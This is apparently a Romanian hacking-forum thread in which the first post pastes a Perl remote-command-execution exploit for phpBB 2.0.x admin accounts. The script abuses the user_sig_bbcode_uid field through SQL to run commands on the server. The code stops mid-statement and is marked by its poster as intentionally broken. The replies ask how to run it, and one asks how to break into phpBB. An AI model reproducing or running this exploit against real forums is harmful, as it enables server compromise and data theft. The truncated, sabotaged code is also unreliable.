ecstazy_kid Posted June 18, 2006 Report Share Posted June 18, 2006 #!/usr/bin/perl## r57phpbba2e2.pl - phpBB admin 2 exec exploit ## version 2 (based on user_sig_bbcode_uid bug)## tested on 2.0.12 , 2.0.13 , 2.0.19## --------------------------------------------## screen## r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L admin -P password## Command for execute or 'exit' for exit # id## uid=80(www) gid=80(www) groups=80(www)## Command for execute or 'exit' for exit # exit ## --------------------------------------------## *** surprise included;) and broken. /str0ke## 20/02/06 ## 1dt.w0lf## RST/GHC (http://rst.void.ru , http://ghc.ru)use LWP::UserAgent;use Getopt::Std;use HTTP::Cookies;getopts("u:L:P:i:p:o:");$url    = $opt_u;$login   = $opt_L;$password = $opt_P;$id    = $opt_i || 2;$prefix  = $opt_p || 'phpbb_';$proxy   = $opt_o;if(!$url || !$login || !$password){&usage;}$|++;$xpl = LWP::UserAgent->new() or die;$cookie_jar = HTTP::Cookies->new();$xpl->cookie_jar( $cookie_jar );$xpl->proxy('http'=>'http://'.$proxy) if $proxy;$ids = 'IDS:r57 phpBB2 exploit a2e2#20022006|'.$url.'|'.$login.'|'.$password.'|'.$id.'|'.$prefix; $res = $xpl->post($url.'login.php', [ "username"  => "$login", "password"  => "$password", "autologin"  => "on", "admin"    => "1", "login"    => "Log in", ],"User-Agent" => "$ids"); $cookie_jar->extract_cookies($res); if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; }  while () {   print "Command for execute or 'exit' for exit # ";   while(<STDIN>)   {     $cmd=$_;     chomp($cmd);     exit() if ($cmd eq 'exit');     last;   }   &run($cmd); }sub run($) {  $sql  = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e Quote Link to comment Share on other sites More sharing options...
PsYKid Posted June 18, 2006 Report Share Posted June 18, 2006 E bun exploitul dar daca nu ai useru si parola de la admin nu cred ca merge. Asa`i ? Quote Link to comment Share on other sites More sharing options...
ecstazy_kid Posted June 18, 2006 Author Report Share Posted June 18, 2006 din cate inteleg te autologheaza... Quote Link to comment Share on other sites More sharing options...
indoz Posted June 18, 2006 Report Share Posted June 18, 2006 mhhh : aveti grija cand copiati textul unde sunt smyles-uri Quote Link to comment Share on other sites More sharing options...
ecstazy_kid Posted June 18, 2006 Author Report Share Posted June 18, 2006 P.S.: Exploit care ruleaza din perl ..!PERL ruleaza exploit-ul respectiv[/quote:69189312cf]Ma rog.. Quote Link to comment Share on other sites More sharing options...
CYb0rG Posted June 18, 2006 Report Share Posted June 18, 2006 folositi [ code ] cand postati ceva, damn.. Quote Link to comment Share on other sites More sharing options...
edyshmen Posted June 20, 2006 Report Share Posted June 20, 2006 cum sparg phpBB? Quote Link to comment Share on other sites More sharing options...
Renegade Posted December 10, 2006 Report Share Posted December 10, 2006 Poate sunt eu n00b,spunetimi si mie cum il execut in windows.Am instalat ActivePerl-5.6.1.638-MSWin32-x86 si nu merge. Quote Link to comment Share on other sites More sharing options...
virusz Posted December 11, 2006 Report Share Posted December 11, 2006 ai mura in gura direct pe forum, cauta mai, nu cere atata!Cine imi zice si mie cum pornesc pc-ul? (acum sunt la un club si era pornit), la mine are doar 2 butoane si 2 "becuri" ,nu stiu pe care sa apas, am apasat pe amandoua dar nu merge.... nu stiti?PS: cred ca nu l-am bagat in priza.... dar parca se aude ceva inauntru... o fii un hertz ratacit! Quote Link to comment Share on other sites More sharing options...
Xtremefoob Posted December 13, 2006 Report Share Posted December 13, 2006 Multumesc, foarte util! Quote Link to comment Share on other sites More sharing options...
4n4rchyl04d3r Posted December 17, 2006 Report Share Posted December 17, 2006 nu merge.... Quote Link to comment Share on other sites More sharing options...